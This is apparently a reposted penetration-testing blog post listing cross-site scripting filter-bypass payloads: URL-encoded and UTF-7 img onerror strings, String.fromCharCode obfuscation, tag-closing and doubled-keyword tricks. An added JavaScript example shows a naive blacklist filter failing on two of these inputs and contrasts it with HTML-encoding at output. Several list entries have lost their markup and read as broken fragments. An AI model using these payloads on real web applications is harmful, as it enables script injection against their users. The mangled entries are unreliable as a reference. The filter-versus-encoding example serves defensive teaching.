Cross site scripting,XSS,bypass XSS filter,xss payload

Cross-site scripting (XSS) is a web application attack that arises from a flaw in how data is output to the page, allowing an attacker to construct malicious data that is displayed in the page. Because cross-site scripting attacks write malicious script or HTML code into the page content, the vulnerability is also known as an HTML injection vulnerability.

How to bypass WAF:

Encoding bypass
Hex encode: alert(‘123’)jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-

magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)

close tag:
“>alert(/123/)
alert(1)

Case insensitive: alert(‘123’)

use other tag: XSS
<img a=”
“onsubmit=javascript:alert(1)%20name=”a

use comment: %0aalert(1);
/**/
%00

Two-letter bypass:

alalertert(123)

Other events bypass:
onload
onclick
onerror
prompt
confirm
onmousemove
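
The two-letter and URL-encoding entries above both succeed against the same design flaw: a blacklist applied once, to the raw value, before the application decodes it. The following added example (not from the original post; all function names are hypothetical, and the two inputs are strings quoted in the list above) runs them through such a filter and then through decode-then-encode output handling.

```javascript
// Added example, not from the original post. Function names are hypothetical.

// Decode once; malformed percent-escapes are kept as literal text.
function safeDecode(raw) {
  try { return decodeURIComponent(raw); } catch (e) { return raw; }
}

// Weak: blacklist filter, single pass, run on the still-encoded request value.
function naiveFilter(raw) {
  return raw
    .replace(/<[^>]*>/g, "")  // strip anything that looks like a tag
    .replace(/alert/g, "");   // strip a keyword, but never re-scan the result
}

// Weak rendering: filter first, decode afterwards, concatenate into markup.
function renderWeak(raw) {
  return "<p>" + safeDecode(naiveFilter(raw)) + "</p>";
}

// Hardened: no blacklist. Decode first, then HTML-encode at the point of output.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSafe(raw) {
  return "<p>" + escapeHtml(safeDecode(raw)) + "</p>";
}

// Inputs taken from the list above.
const samples = [
  "alalertert(123)",                            // keyword re-forms after one strip
  "%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E",  // no "<" present until decoded
];

for (const s of samples) {
  console.log("input   :", s);
  console.log("weak    :", renderWeak(s));
  console.log("hardened:", renderSafe(s));
}
```

`escapeHtml` as written covers HTML body text and quoted attribute values only; values placed in script blocks, URLs or CSS need the encoder for that context.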

The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux. http://ift.tt/2pm5VF1 http://ift.tt/2aM8QhC
